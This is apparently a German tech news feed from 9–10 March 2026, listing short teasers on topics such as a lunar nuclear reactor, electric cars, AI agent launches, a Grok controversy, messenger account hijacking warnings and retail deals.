Russland will in fünf bis sieben Jahren einen Atom-Reaktor auf dem Mond bauen und die USA in ihrem Vorhaben überholen. Das Kernkraftwerk ist für Chinas Mondbasis. (Atomkraft, Raumfahrt)

Article link

Date of publish: Tue, 10 Mar 2026 10:45:02 +0100

Sequels: Schwarzenegger nennt Pläne für Predator und Conan

Laut Arnold Schwarzenegger könnten neue Filme zu Predator, Conan und Phantomkommando entstehen. Konkrete Projekte sind jedoch nicht bestätigt. (Filme & Serien, Film)

Article link

Date of publish: Tue, 10 Mar 2026 10:31:00 +0100

Podcast Besser Wissen: Techno, Tanzen und Tauchen

Wir unterhalten uns im Podcast mit dem DJ WolleXDP über den Rausch der Tiefe und rauschfreie Parties. (Besser Wissen, Podcast)

Article link

Date of publish: Tue, 10 Mar 2026 10:30:02 +0100

MEB+-Plattform: Cupra Born 2026 mit neuer Optik und neuem Cockpit

Der Cupra Born bekommt ein überarbeitetes Design, ein größeres Display und eine stärkere Topmotorisierung dank MEB+-Plattform. (Cupra, Elektroauto)

Article link

Date of publish: Tue, 10 Mar 2026 10:25:02 +0100

Open-Fan-Triebwerke: Airbus A380 bekommt Propellerantrieb

Der klassische Propeller als Hochleistungstriebwerk könnte Flugzeuge effizienter und leiser machen. 2029 soll ein A380 damit abheben. (Flugzeug, Airbus)

Article link

Date of publish: Tue, 10 Mar 2026 10:13:01 +0100

Ghost of Yotei: Warum Sucker Punch sogar gute Ideen gestrichen hat

Klettern wie in Zelda? Bei Ghost of Yotei sind spannende Funktionen gestrichen worden, weil es um ein spezielles Spielgefühl geht. Von Peter Steinlechner (Ghost of Yotei, Spiele)

Article link

Date of publish: Tue, 10 Mar 2026 10:02:04 +0100

Powerus: US-Start-up will ukrainische Kriegstechnologie für die USA

Ein neues Drohnenunternehmen mit prominenten Investoren plant, ukrainische Drohnen-Technologie für das US-Militär nutzbar zu machen. (Drohne, Politik)

Article link

Date of publish: Tue, 10 Mar 2026 09:59:01 +0100

Jobfresser: Arbeitsmarktforscher erwartet durch KI Massenelend

Ein Ökonom erklärt, warum der technologische Wandel durch KI kein normaler Strukturwandel ist - und warum Massenelend keine Übertreibung ist. (Arbeit, KI)

Article link

Date of publish: Tue, 10 Mar 2026 09:53:01 +0100

Geheimdienste warnen: Spione kapern reihenweise Signal- und Whatsapp-Konten

Die Angreifer geben sich häufig als Support-Mitarbeiter aus und versuchen, per Social Engineering in Signal- und Whatsapp-Konten einzudringen. (Spionage, Phishing)

Article link

Date of publish: Tue, 10 Mar 2026 09:42:01 +0100

Energyminer: Erstes Energyfish-Schwarmkraftwerk für den Rhein

124 schwimmende Turbinen sollen künftig im Rhein bei Sankt Goar Strom erzeugen - ohne Staudamm, ohne Lärm, bei Tag und Nacht. (Energie & Klima)

Article link

Date of publish: Tue, 10 Mar 2026 09:33:02 +0100

Elektromobilität: USA starten Pilotprogramm für elektrische Flugtaxitests

Die FAA lässt acht Pilotprogramme für eVTOL-Tests zu. Archer, Joby und Co. dürfen damit früher abheben als ursprünglich geplant. (Lufttaxi, Elektromobilität)

Article link

Date of publish: Tue, 10 Mar 2026 09:26:02 +0100

(g+) Heute um 17 Uhr live: Stell deine Fragen zur digitalen Souveränität

Lock-in verstehen und reduzieren: Caspar Clemens Mierau alias @leitmedium beantwortet deine Fragen - exklusiv im Golem-Plus-AMA per Videochat. Hier kommt der Teilnahmelink! (Digitale Souveränität, Politik)

Article link

Date of publish: Tue, 10 Mar 2026 09:14:01 +0100

Spritpreise: 2,10 Euro an der Zapfsäule - was jetzt hilft

Der Irankrieg hat die Benzin- und Dieselpreise auf das Niveau von 2022 getrieben. Wer klug tankt und vorausdenkt, kann trotzdem sparen - politische Hilfe kommt dagegen zu spät. Ein Ratgebertext von Andreas Donath (Auto, Elektroauto)

Article link

Date of publish: Tue, 10 Mar 2026 09:04:02 +0100

Weniger sichtbare Smart-Lock-Technik: Nuki-und Tedee-Integration für Neubautüren vorgestellt

Die beiden Smart-Lock-Hersteller Nuki und Tedee haben jeweils neue Produkte vorgestellt, die smarte Türschlösser teilweise neu denken. (Smartlock, Smart Home)

Article link

Date of publish: Tue, 10 Mar 2026 08:37:05 +0100

Singleplayer: "Ich liebe schwierige Spiele!"

Infinity-Ward-Designer Brett Moody erklärt, wie Entwickler die Schwierigkeitseinstellungen gezielt gestalten können. Von Peter Steinlechner (GDC 2026, Spiele)

Article link

Date of publish: Tue, 10 Mar 2026 08:29:01 +0100

Künstliche Intelligenz: Yann LeCun sammelt eine Milliarde Dollar für AMI ein

Mit AMI will Yann LeCun Weltmodelle entwickeln, die Physik verstehen. Investoren wie Jeff Bezos und Nvidia bewerten die Firma mit Milliarden. (Unternehmen, KI)

Article link

Date of publish: Tue, 10 Mar 2026 08:23:01 +0100

Razer Ava: Der agentische KI-Tänzer im Einmachglas

Genial oder gaga? Razers KI-Hologramm Ava wird leistungsstärker als erwartet. Golem hat einen ersten Blick darauf geworfen. Von Peter Steinlechner (Razer, KI)

Article link

Date of publish: Tue, 10 Mar 2026 08:12:01 +0100

Golem-Konferenz Rack & Stack 2026: Von der Cloud ins eigene Rack

Hyperscaler sind kritische Infrastruktur und können im Krieg zum Angriffsziel werden. Noch ein guter Grund, sich unabhängig zu machen - wie, das zeigt unsere Fachkonferenz Rack & Stack. (Golem.de, Software)

Article link

Date of publish: Tue, 10 Mar 2026 08:00:01 +0100

Claude Code: KI-Agenten durchleuchten Pull Requests

Anthropic bringt automatisierte Code-Reviews per Multi-Agenten-System. Ein einzelner PR kann dabei bis zu 25 US-Dollar kosten. (Anthropic, KI)

Article link

Date of publish: Tue, 10 Mar 2026 07:45:02 +0100

QA Companion: Razer zeigt KI-Tester für Spieleentwickler

Razer will die Qualitätssicherung mit KI optimieren. Das System soll Testfälle erstellen, Bugs erkennen und Spiele selbstständig durchspielen. (Razer, KI)

Article link

Date of publish: Tue, 10 Mar 2026 07:27:02 +0100

Agentic Ai Hub: Bundesministerium schickt KI-Agenten in 17 Kommunen

Das Bundesministerium für Digitales startet 18 Pilotprojekte, bei denen KI-Systeme Verwaltungsaufgaben übernehmen sollen. (KI, Software)

Article link

Date of publish: Tue, 10 Mar 2026 07:22:01 +0100

Anzeige: Barrierefreiheit im Web - BFSG, WCAG & praktische Umsetzung

Barrierefreiheit im Web wird mit dem Barrierefreiheitsstärkungsgesetz (BFSG) für viele digitale Angebote zum Compliance-Thema. (Golem Karrierewelt, Unternehmenssoftware)

Article link

Date of publish: Tue, 10 Mar 2026 07:15:01 +0100

Supersportwagen AMG GT: Mercedes modifiziert den Hyperscreen

Für sein bislang sportlichstes Elektroauto hat Mercedes einen neuen Innenraum entwickelt. Die Displays beim AMG GT sind stärker auf den Fahrer ausgerichtet. (Mercedes Benz, Elektroauto)

Article link

Date of publish: Tue, 10 Mar 2026 07:11:01 +0100

Autonomes Fahren: Tesla durchbricht im FSD-Modus Bahnschranken

Offenbar hat Tesla immer noch Probleme bei der Erkennung von Bahnschranken. Eine Untersuchung dazu läuft schon. (Tesla, Elektroauto)

Article link

Date of publish: Mon, 09 Mar 2026 22:12:01 +0100

Anzeige: Kompressor für Makita-18V-Akku bei Amazon für unter 40 Euro

Bei Amazon gibt es einen Kompressor für den 18V-Akku von Makita, der gerade keine 40 Euro kostet. (Technik/Hardware)

Article link

Date of publish: Mon, 09 Mar 2026 18:43:01 +0100

FTTH: Deutsche Giganetz sagt Ausbau in mehreren Städten ab

In vier Großstädten wird Deutsche Giganetz nicht wie angekündigt FTTH ausrollen. Laut eigenem Bekunden ist der Netzbetreiber nicht in Schwierigkeiten. (Glasfaser, Open Access)

Article link

Date of publish: Mon, 09 Mar 2026 18:35:02 +0100

Anzeige: Kaffeemaschine von Nespresso im Angebot für unter 55 Euro

Die Inissia von Nespresso heizt in 25 Sekunden auf, bietet Zero-Touch-Brewing, abnehmbare Abstellfläche und geringen Stromverbrauch. (Technik/Hardware, Haushaltsgeräte)

Article link

Date of publish: Mon, 09 Mar 2026 18:03:01 +0100

Anzeige: Vertikale Maus von Logitech zum Jahresbestpreis bei Amazon

Die Logitech Lift soll Hände und Arme beim Arbeiten schonen. Amazon verkauft die vertikale Maus zum niedrigsten Preis des Jahres. (Maus, Amazon)

Article link

Date of publish: Mon, 09 Mar 2026 17:33:01 +0100

P100, Bartlett & Panther Lake: AMD und Intel stellen neue Embedded-CPUs vor

Embedded Systems brauchen zuverlässige Prozessoren. AMD und Intel stellen neue Modelle mit langer Verfügbarkeit vor - auch die lang erwarteten Bartlett Lake. (Prozessor, AMD)

Article link

Date of publish: Mon, 09 Mar 2026 17:30:02 +0100

Anzeige: Smarte Körperfettwaage mit App für nur 21,99 Euro bei Amazon

Amazon hat eine smarte Körperfettwaage im Angebot, mit der das Gewicht und weitere Werte auch über das Smartphone ausgewertet werden können. (Technik/Hardware, Bluetooth)

Article link

Date of publish: Mon, 09 Mar 2026 17:10:01 +0100

Anzeige: GPS-Fahrradcomputer jetzt 30 Euro günstiger bei Amazon

Der Igsport-BiNavi-GPS-Fahrradcomputer mit 3,5-Zoll-Touchscreen kostet bei Amazon jetzt deutlich weniger als im Schnitt der letzten Monate. (Garmin, GPS)

Article link

Date of publish: Mon, 09 Mar 2026 16:41:01 +0100

Schuld an Toten und Massenpanik: Grok beleidigt und verunglimpft Fußballfans

Der Chatbot Grok hat nach Aufforderung Fußballfans beleidigt und ihnen die Schuld an Toten bei Massenpaniken gegeben. (Grok, KI)

Article link

Date of publish: Mon, 09 Mar 2026 16:32:01 +0100

Anzeige: E-Scooter mit bis zu 40 km Reichweite zum neuen Bestpreis

Bei Amazon gibt es derzeit einen interessanten Elektroroller von iScooter im Angebot. Er ist zum neuen Bestpreis erhältlich. (Elektroroller, Amazon)

Article link

Date of publish: Mon, 09 Mar 2026 15:50:02 +0100

Erstaunliche Reichweite: Ingenieur baut E-Auto-Akku aus E-Zigaretten

Ein britischer Hobbybastler baute einen alten Elektro-Kleinstwagen so um, dass er mit Lithiumzellen aus Einweg-E-Zigaretten fahren konnte. (Auto, Akku)

Article link

Date of publish: Mon, 09 Mar 2026 15:46:01 +0100